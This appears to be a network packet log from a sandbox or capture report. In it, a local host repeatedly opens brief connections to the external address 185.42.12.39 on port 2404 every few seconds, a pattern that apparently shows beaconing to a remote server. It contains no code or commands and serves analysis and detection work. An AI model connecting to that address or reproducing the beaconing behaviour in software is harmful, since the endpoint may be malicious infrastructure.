                                                                                                                                                                                            Dec 6, 2024 17:35:41.401642084 CET240449978185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:41.402256966 CET499782404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:42.295816898 CET499852404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:42.415793896 CET240449985185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:42.415879965 CET499852404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:42.420805931 CET499852404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:42.540529966 CET240449985185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:43.742861986 CET240449985185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:43.970221043 CET499852404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:43.975569010 CET240449985185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:43.978045940 CET499852404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:43.978210926 CET499852404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:44.098125935 CET240449985185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:44.098205090 CET499852404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:44.952075005 CET499922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:45.071897030 CET240449992185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:45.071988106 CET499922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:45.075680971 CET499922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:45.195514917 CET240449992185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:46.410299063 CET240449992185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:46.467219114 CET499922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:46.647053003 CET240449992185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:46.650569916 CET499922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:46.650616884 CET499922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:46.770684958 CET240449992185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:46.770772934 CET499922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:47.592639923 CET499982404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:47.712522984 CET240449998185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:47.714349985 CET499982404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:47.718219042 CET499982404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:47.838104963 CET240449998185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:49.040918112 CET240449998185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:49.154922009 CET499982404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:49.279258966 CET240449998185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:49.284424067 CET499982404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:49.284502029 CET499982404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:49.405113935 CET240449998185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:49.405226946 CET499982404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:50.202038050 CET500052404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:50.322503090 CET240450005185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:50.322587013 CET500052404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:50.327452898 CET500052404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:50.447237968 CET240450005185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:51.648725986 CET240450005185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:51.756032944 CET500052404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:51.883244991 CET240450005185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:51.886049986 CET500052404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:51.886128902 CET500052404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:52.006019115 CET240450005185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:52.006140947 CET500052404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:52.764790058 CET500112404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:52.884608030 CET240450011185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:52.884730101 CET500112404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:52.888525009 CET500112404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:53.008361101 CET240450011185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:54.213531971 CET240450011185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:54.357861996 CET500112404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:54.447153091 CET240450011185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:54.449408054 CET500112404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:54.449408054 CET500112404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:54.569611073 CET240450011185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:54.569798946 CET500112404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:55.297415018 CET500202404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:55.417628050 CET240450020185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:55.417917013 CET500202404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:55.423155069 CET500202404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:55.544018030 CET240450020185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:56.770073891 CET240450020185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:56.967222929 CET500202404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:57.007356882 CET240450020185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:57.013452053 CET500202404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:57.013720036 CET500202404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:57.133332968 CET240450020185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:57.133403063 CET500202404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:57.842669964 CET500272404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:57.962865114 CET240450027185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:57.963071108 CET500272404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:57.966814041 CET500272404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:58.087450981 CET240450027185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:59.291481972 CET240450027185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:59.467348099 CET500272404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:59.527390003 CET240450027185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:59.533458948 CET500272404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:59.533618927 CET500272404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:35:59.653717995 CET240450027185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:35:59.653795958 CET500272404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:00.327493906 CET500332404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:00.448059082 CET240450033185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:00.448168039 CET500332404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:00.453567982 CET500332404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:00.574645042 CET240450033185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:01.776634932 CET240450033185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:01.857960939 CET500332404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:02.011974096 CET240450033185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:02.014508009 CET500332404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:02.014601946 CET500332404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:02.134402990 CET240450033185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:02.134480000 CET500332404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:02.780652046 CET500392404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:02.900568008 CET240450039185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:02.900650978 CET500392404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:02.907625914 CET500392404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:03.027538061 CET240450039185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:04.227955103 CET240450039185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:04.466768980 CET240450039185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:04.466834068 CET500392404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:04.469954967 CET500392404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:04.470004082 CET500392404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:04.594538927 CET240450039185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:04.594616890 CET500392404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:05.224740028 CET500452404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:05.345148087 CET240450045185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:05.346338034 CET500452404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:05.377430916 CET500452404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:05.497482061 CET240450045185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:06.712307930 CET240450045185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:06.764110088 CET500452404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:06.947340012 CET240450045185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:06.949951887 CET500452404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:06.950035095 CET500452404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:07.069801092 CET240450045185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:07.069864988 CET500452404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:07.670986891 CET500522404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:07.790777922 CET240450052185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:07.792442083 CET500522404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:07.866590977 CET500522404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:07.987536907 CET240450052185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:09.120388031 CET240450052185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:09.264137983 CET500522404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:09.355029106 CET240450052185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:09.360706091 CET500522404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:09.360706091 CET500522404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:09.480770111 CET240450052185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:09.486279964 CET500522404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:10.061444998 CET500572404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:10.181257963 CET240450057185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:10.181534052 CET500572404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:10.185245991 CET500572404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:10.304959059 CET240450057185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:11.542507887 CET240450057185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:11.654776096 CET500572404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:11.775322914 CET240450057185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:11.777560949 CET500572404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:11.777607918 CET500572404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:11.898397923 CET240450057185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:11.898789883 CET500572404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:12.452227116 CET500582404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:12.572393894 CET240450058185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:12.572484016 CET500582404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:12.577418089 CET500582404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:12.697738886 CET240450058185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:13.903383017 CET240450058185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:13.967282057 CET500582404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:14.143778086 CET240450058185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:14.146112919 CET500582404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:14.146112919 CET500582404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:14.266094923 CET240450058185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:14.266189098 CET500582404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:14.795967102 CET500592404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:14.916455984 CET240450059185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:14.916676044 CET500592404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:14.921049118 CET500592404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:15.040883064 CET240450059185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:16.244856119 CET240450059185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:16.388012886 CET500592404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:16.479190111 CET240450059185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:16.481611967 CET500592404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:16.481668949 CET500592404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:16.603890896 CET240450059185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:16.603955984 CET500592404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:17.108890057 CET500602404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:17.229038000 CET240450060185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:17.230381966 CET500602404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:17.234216928 CET500602404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:17.354131937 CET240450060185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:18.558537006 CET240450060185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:18.654860973 CET500602404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:18.791302919 CET240450060185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:18.794758081 CET500602404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:18.794806957 CET500602404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:18.915664911 CET240450060185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:18.915755987 CET500602404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:19.405313969 CET500612404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:19.525424004 CET240450061185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:19.525515079 CET500612404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:19.529305935 CET500612404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:19.649836063 CET240450061185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:20.854274988 CET240450061185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:20.967458963 CET500612404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:21.087245941 CET240450061185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:21.092700005 CET500612404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:21.092730999 CET500612404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:21.212610006 CET240450061185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:21.214404106 CET500612404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:21.686687946 CET500622404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:21.806776047 CET240450062185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:21.806876898 CET500622404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:21.811335087 CET500622404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:21.932154894 CET240450062185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:23.135308981 CET240450062185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:23.264169931 CET500622404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:23.371737957 CET240450062185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:23.374686956 CET500622404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:23.374747992 CET500622404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:23.494729996 CET240450062185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:23.496818066 CET500622404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:23.952115059 CET500632404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:24.072058916 CET240450063185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:24.072156906 CET500632404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:24.076625109 CET500632404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:24.196536064 CET240450063185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:25.400029898 CET240450063185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:25.467297077 CET500632404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:25.635328054 CET240450063185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:25.640248060 CET500632404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:25.640295982 CET500632404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:25.760179996 CET240450063185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:25.760273933 CET500632404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:26.187844038 CET500642404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:26.307709932 CET240450064185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:26.307782888 CET500642404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:26.311988115 CET500642404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:26.431819916 CET240450064185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:27.637103081 CET240450064185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:27.764211893 CET500642404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:27.871498108 CET240450064185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:27.873946905 CET500642404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:27.873981953 CET500642404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:27.994301081 CET240450064185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:27.994374990 CET500642404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:28.405642033 CET500652404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:28.525326014 CET240450065185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:28.525398970 CET500652404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:28.529983997 CET500652404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:28.649648905 CET240450065185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:29.854130030 CET240450065185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:29.967335939 CET500652404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:30.087397099 CET240450065185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:30.092761993 CET500652404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:30.092761993 CET500652404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:30.212774038 CET240450065185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:30.213203907 CET500652404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:30.608603954 CET500662404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:30.728512049 CET240450066185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:30.728635073 CET500662404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:30.732094049 CET500662404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:30.852020025 CET240450066185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:32.060560942 CET240450066185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:32.170485973 CET500662404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:32.295893908 CET240450066185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:32.298274040 CET500662404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:32.298315048 CET500662404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:32.418103933 CET240450066185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:32.418371916 CET500662404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:32.796174049 CET500672404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:32.916052103 CET240450067185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:32.916235924 CET500672404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:32.921149969 CET500672404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:33.041259050 CET240450067185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:34.244076014 CET240450067185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:34.467369080 CET500672404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:34.479444027 CET240450067185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:34.484607935 CET500672404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:34.484627008 CET500672404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:34.604685068 CET240450067185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:34.606451988 CET500672404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:34.968017101 CET500682404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:35.088114023 CET240450068185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:35.088210106 CET500682404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:35.093431950 CET500682404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:35.213177919 CET240450068185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:36.416269064 CET240450068185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:36.467369080 CET500682404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:36.651453972 CET240450068185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:36.653712988 CET500682404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:36.653770924 CET500682404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:36.773777962 CET240450068185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:36.773834944 CET500682404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:37.124177933 CET500692404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:37.244299889 CET240450069185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:37.244390965 CET500692404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:37.249855995 CET500692404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:37.369734049 CET240450069185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:38.581029892 CET240450069185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:38.654870033 CET500692404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:38.899275064 CET240450069185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:38.905792952 CET500692404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:38.905838966 CET500692404192.168.2.4185.42.12.39
